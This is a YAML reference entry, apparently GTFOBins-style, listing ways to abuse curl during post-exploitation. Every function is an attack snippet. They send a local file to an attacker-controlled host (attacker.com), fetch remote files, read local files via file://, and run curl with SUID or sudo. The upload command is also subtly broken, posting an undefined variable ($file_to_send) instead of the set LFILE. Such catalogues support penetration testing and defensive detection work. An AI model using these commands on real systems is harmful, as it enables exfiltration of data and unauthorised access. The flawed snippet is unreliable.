--- functions: upload: - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the `@` to send hard-coded data. code: | URL=http://attacker.com/ LFILE=file_to_send curl -X POST -d @$file_to_send $URL download: - description: Fetch a remote file via HTTP GET request. code: | URL=http://attacker.com/file_to_get LFILE=file_to_save curl $URL -o $LFILE file-read: - description: The file path must be absolute. code: | LFILE=/tmp/file_to_read curl file://$LFILE suid-enabled: - description: Fetch a remote file via HTTP GET request. code: | URL=http://attacker.com/file_to_get LFILE=file_to_save ./curl $URL -o $LFILE sudo-enabled: - description: Fetch a remote file via HTTP GET request. code: | URL=http://attacker.com/file_to_get LFILE=file_to_save sudo -E curl $URL -o $LFILE ---